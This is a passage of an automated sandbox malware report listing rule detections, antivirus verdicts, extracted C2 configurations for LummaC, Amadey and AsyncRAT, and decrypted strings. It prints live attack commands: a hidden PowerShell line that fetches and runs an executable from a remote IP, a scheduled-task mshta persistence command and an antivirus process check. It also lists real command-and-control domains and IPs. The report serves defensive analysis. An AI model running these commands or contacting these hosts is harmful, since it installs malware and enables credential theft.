                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe, ParentProcessId: 7200, ParentProcessName: 7ecb69d7f1.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, ProcessId: 5584, ProcessName: cmd.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5600, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 948, ProcessName: schtasks.exe
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7188, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 824, ProcessName: powershell.exe
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1412, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", ProcessId: 2004, ProcessName: wscript.exe
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7188, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 824, ProcessName: powershell.exe

                                Data Obfuscation

                                Source: Process started | Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7188, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 824, ProcessName: powershell.exe

                                HIPS / PFW / Operating System Protection Evasion

                                Source: Process started | Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5584, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5368, ProcessName: findstr.exe

AV Detection

Source: QkRFz2sau5.exe | Avira: detected
Source: voicesharped.com | Avira URL Cloud: Label: malware
Source: https://paleboreei.biz/ | Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpQT4un | Avira URL Cloud: Label: malware
Source: https://importenptoc.com/ | Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php | Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/apit4 | Avira URL Cloud: Label: malware
Source: https://importenptoc.com/P1X | Avira URL Cloud: Label: malware
Source: actiothreaz.com | Avira URL Cloud: Label: malware
Source: breedertremnd.com | Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/7244183739/L5shRfh.exe | Avira URL Cloud: Label: phishing
Source: https://rebeldettern.com/api | Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/apio | Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/apit | Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/apiv | Avira URL Cloud: Label: malware
Source: https://cozyhomevpibes.cyou/ | Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/apie | Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/apiR | Avira URL Cloud: Label: malware
Source: https://paleboreei.biz/c | Avira URL Cloud: Label: malware
Source: importenptoc.com | Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpW | Avira URL Cloud: Label: malware
Source: https://paleboreei.biz/apis?: | Avira URL Cloud: Label: malware
Source: inputrreparnt.com | Avira URL Cloud: Label: malware
Source: https://paleboreei.biz/api | Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/p | Avira URL Cloud: Label: malware
Source: https://rebeldettern.com/k | Avira URL Cloud: Label: malware
Source: http://185.215.113.16/mine/random.exe | Avira URL Cloud: Label: malware
Source: https://importenptoc.com/Y | Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpE | Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpI | Avira URL Cloud: Label: malware
Source: https://importenptoc.com/P | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["cozyhomevpibes.cyou", "importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "FATE99--test"}
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack | Malware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "159.100.19.137", "Ports": "7707", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "svchost.exe", "Install_File": "MTZ4cVRldGczWDFoSHVwbHNqYlc2ZE9GUXRheUlEdnY="}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe | ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[1].exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[2].exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\random[2].exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[2].exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE | ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe | ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | ReversingLabs: Detection: 47%
Source: QkRFz2sau5.exe | Virustotal: Detection: 54%
Source: QkRFz2sau5.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe | Joe Sandbox ML: detected
Source: QkRFz2sau5.exe | Joe Sandbox ML: detected
Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 7707
Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 159.100.19.137
Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 0.5.8
Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp | String decryptor: false
Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp | String decryptor: yBu0GW2G5zAc
Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp | String decryptor: MIIE7DCCAtSgAwIBAgIQAM+os8tD+NpTWChT8JYtyzANBgkqhkiG9w0BAQ0FADAXMRUwEwYDVQQDDAxUcnVzdCBTZXJ2ZXIwIBcNMjUwMTIwMDM1NjA0WhgPOTk5OTEyMzEyMzU5NTlaMBcxFTATBgNVBAMMDFRydXN0IFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJ5FzkhjuI8et+p8G29QDGsZ28VZ1PtKbMZx8FrxkUQoQBU7DXFh8mfgTQUhWgMqctpupDC+UhQxQkedPdHe9SvuAtpKEWUFOQzNQMTy3JEvHv3UZfM9Ib5ICGCQtcqInk73RbEh7QdFBK6wE57zENL9lXy8aEBeJk/elSNvLTJwbpa+lP20hlBuuyBWqvPd4/DinQJIRYSIEPDa3hcefGCbnoTp3dg9jttDM+MXtGEz4OurkP47+nFeHgQe7FkNCi5UHaiwvNs8JR7L1yR7HTPlvSwRtAkC0STJtczRA93If63bYMkaC+1QNHQR+WN3c9MCK6SLbGk4nMfSiG3ybohbKhNoJIcsdyFyOOn6N54eCaEwwNzDlb1qkor0bemYVuaT3ZRG27H6C9R9eqyoHQ4WTppSBIm+MBQ+gimD6XdEUCBcM0qAvrVFEy+mFn8FIhKAng9fgPnd47WWJGosTjsezqxJTVYYhUn2dm/VU3O0sdfzJ8O9dIO4htYIs+X5PMuBP2HyLGDsa+VpEkayYMYGmiHD6wDrO20+Z5BdbGUikNdfKo4goEu3A/HIa7YuzFN70ma9Qb+7P448L3mu8pLbll+0iUNo2rYrJ+7nMjduOTeKdBPPYNBHj57Zdd1MkQaIBhHNQ04qdBZYUhJclvbLlx1nPLSMQI9XL0NoRDXvAgMBAAGjMjAwMB0GA1UdDgQWBBSnnBI6rWXybai+OiRUoM3TzO1xlTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCLFgYyTM5EWEcXb2nZYzeqhuu/lhz0AuSDBoXDWQYuV1CgsKoab0s2yZ1v0jRw77uM1AsLSRhBurUqdmn+iZVi/vtys/BrLFwuc/5hQkz5MFZAt2qJFc8QRV8E6jJcjuapfJT4oweDd8J1Dstz2x2g6IV8mT5mApzjom+zZwy0G9Qm6S72xbaz8HZicPNRfDUR0SMg652oet7qMrCa2T5T5lrh3+XDogmC1ofzA2lbWuhOb6LNs0uzjiC/NENspNylQFf1D+odhNDdQQHu91SSZLnouuhb9jErxYvCoW7c5U14xsNPKRAjcONjtPSbhMvIwaApa2/wVSil0bk8dbSLnA6Kx7UBPgls8ec/jhgkHTycXE6U8XoPS+louYxi5EdwvqghzRC/itX+SPBq9pMpN8FWXEgVliWc0ViOwS/okPlCW60cFGU+R0lQbYJDyVDqJBflraw7Hqb7cQS5v2gCgogUQBqD9I7SiYbbqs0GUh/b3Zv+Qt7wKzyEGJNuoRei7uDp1xb5uDNprDkZomqHmiSKc1LggyPY4+rcNLDTEkXPq/cjMI2CzPXEpHARNgMQ/YEzM07I51CLT2Szm7G3z8uIng35vjc24l3AqClQ1dcJHQBIHjEqoqrUGLmjUiFfGuL549Mt6Na3OmoCTb0J+r6S8/sp2l/nX9HqHqAoxA==
Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp | String decryptor: GP97vNLr0Wa9AfljI/phz7VBswKUASqgiIZZNodWNIPzI+56yXWuOpvWNTQgDoUgAOskV2wmjD76A2aVNhUQyD92KSnqDXlLV+P47rGl14aHUzYeuCKUXHJvFlkQk8GfPZNKaXZNiDGmKibSepgjoJIIM3/Vc+3s07D2Dmv8Bo2hYGsNeAEVOq3oF0fCL5kPxaUCQE+9cR0dxZoIfy5DlW14E6ZSTfnUegUZ8g8ADtxIu5h+2fL58CwzpUlLdw8kRHvK2JPYQSAXV3IiMTw58KlB34+Nw51yoc05UAGmWcMJPRuU2+p/l1cNkzDepbf1evSE6bARyi/iao6lMUMD6paEM4DxEFckeqpVjs3BIx6A1EcYTcx8NepXiEhp/eqoqoCjHS/jwuMPB8KLFpBK7upxBrI6YtoB+sFqHq9bo62za97eZbIE5lxlsp88UEhUa6rAgiH9QNyqb+pfOX7MpaYBYpFDqizolVMqtQC20H8E6szaut4gjCIOUqUHhBSgFtWjJGR1F6x4RUn8llIW1Bvn6uRNFur5U9N5XYZxRThgmv05Cr+Qb09v+D95XyOJqvUSTWKXzmr1tMNRcNEyT3g74VybkYdRldrU1n3+MmLM7RsivXydzIm4+qzkyH58CXkq8767vS6MX3HvkK+WsPnITsc0iub7sUPhNwTofv8=
Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp | String decryptor: null
Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp | String decryptor: Default
Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmp | String decryptor: cozyhomevpibes.cyou
Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmp | String decryptor: importenptoc.com
Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmp | String decryptor: voicesharped.com
Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmp | String decryptor: inputrreparnt.com
Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmp | String decryptor: torpdidebar.com
Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmp | String decryptor: rebeldettern.com
Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmp | String decryptor: actiothreaz.com
Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmp | String decryptor: garulouscuto.com
Source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmp | String decryptor: breedertremnd.com
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: 185.215.113.43
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: /Zu7JuNko/index.php
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: S-%lu-
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: abc3bc1985
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: skotes.exe
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: Startup
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: cmd /C RMDIR /s/q
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: rundll32
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: Programs
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: %USERPROFILE%
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: cred.dll|clip.dll|
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: cred.dll
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: clip.dll
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: http://
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: https://
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: /quiet
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: /Plugins/
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: &unit=
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: shell32.dll
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: kernel32.dll
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: GetNativeSystemInfo
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: ProgramData\
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: AVAST Software
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: Kaspersky Lab
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: Panda Security
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: Doctor Web
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: 360TotalSecurity
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: Bitdefender
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: Norton
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: Sophos
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: Comodo
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: WinDefender
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: 0123456789
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: ------
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: ?scr=1
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: ComputerName
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: -unicode-
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: VideoID
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: DefaultSettings.XResolution
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: DefaultSettings.YResolution
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: ProductName
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: CurrentBuild
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: rundll32.exe
Source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp | String decryptor: "taskkill /f /im "
